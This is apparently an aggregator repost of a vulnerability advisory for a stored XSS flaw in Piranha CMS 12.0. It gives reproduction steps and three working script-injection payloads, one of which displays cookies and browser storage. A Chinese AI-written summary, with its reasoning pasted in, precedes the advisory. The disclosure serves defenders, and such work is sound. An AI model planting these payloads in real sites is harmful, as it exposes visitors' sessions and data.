好的,我现在需要帮用户总结这篇文章的内容,控制在100字以内。首先,我仔细阅读了文章,发现它主要讨论的是Piranha CMS 12.0版本中的一个存储型XSS漏洞。漏洞出现在文本块内容中,攻击者可以通过在管理面板添加页面并插入恶意脚本来执行任意JavaScript代码。 接下来,我注意到作者提供了详细的复现步骤,包括登录管理面板、添加页面、插入恶意payload等。这些步骤说明漏洞的利用过程相对简单,而且一旦被利用,攻击者可以窃取用户的Cookie、LocalStorage等敏感信息。 此外,文章还提到了几种不同的payload,包括使用img标签的onerror事件、iframe的base64编码以及details标签的ontoggle事件。这些不同的payload展示了攻击者有多重手段来触发XSS漏洞。 最后,文章指出该漏洞影响所有访问或预览该页面的用户,并且目前还没有可用的补丁版本。这表明问题比较严重,需要尽快修复。 总结起来,我需要将这些关键点浓缩到100字以内。要确保涵盖漏洞类型、影响范围、利用方式以及潜在风险。同时,避免使用像“这篇文章”这样的开头词,直接描述内容即可。 </think> Piranha CMS 12.0 存在存储型 XSS 漏洞,允许攻击者通过 Text 块注入恶意脚本,在其他用户浏览器中执行任意 JavaScript 代码。此漏洞影响所有访问或预览受影响页面的用户,并且目前尚未发布补丁版本。 2026-2-2 21:12:17 Author: cxsecurity.com(查看原文) 阅读量:0 收藏
Piranha CMS 12.0 Stored XSS in Text Block
# Exploit Title: Piranha CMS 12.0 - Stored Cross Site Scripting # Date: 2025-09-26 # Exploit Author: Chidubem Chukwu (Terminal Venom) # LinkedIn : https://www.linkedin.com/in/chidubem-chukwu-20bb202a9? # Vendor Homepage: https://piranhacms.org # Software Link: https://github.com/PiranhaCMS/piranha.core/releases/tag/v12.0 # Version: 12.0 # Category: Web Application # Tested on: Ubuntu 22.04, Piranha CMS v12.0 (local), Chrome # CVE: CVE-2025-57692 # Privilege Level: authenticated user # Patched Version: Not available # Exploit link: https://github.com/Saconyfx/security-advisories/blob/main/CVE-2025-57692/advisory.md ## Reproduction Steps ## PiranhaCMS 12.0 allows stored XSS in the Text content block of Standard and Standard Archive Pages via /manager/pages, enabling execution of arbitrary JavaScript in another user s browser. Reproduction steps 1. Log in to the Piranha admin panel at https://<host>/manager/login. 2. Navigate to Pages. 3. Click Add Page and choose Standard Page or Standard Archive. 4. Enter a page title (e.g., XSS-Test). 5. Click the [ + ] button and select Text under Content to add a Text block. 6. In the Text block input area, paste one of the payloads below (paste directly into the editor and save). The payload will execute immediately when pasted/saved and will also execute for anyone who later accesses or previews the page. Payload A <img src="x" onerror=" alert( 'Cookies: ' + document.cookie + '\n' + 'LocalStorage: ' + JSON.stringify(localStorage) + '\n' + 'SessionStorage: ' + JSON.stringify(sessionStorage) + '\n' + 'URL: ' + window.location.href + '\n' + 'User Agent: ' + navigator.userAgent + '\n' + 'Time: ' + new Date().toLocaleString() ) " /> Payload B — iframe base64 <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> Payload C — details toggle (on-toggle alert) <details open ontoggle=alert('XSS')>Click</details> 7. Click Save. The payload executes immediately upon save (and will execute again when the page is previewed or accessed by others). 8. Anyone who accesses the page (or pastes the payload) will trigger the XSS.
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
如有侵权请联系:admin#unsafe.sh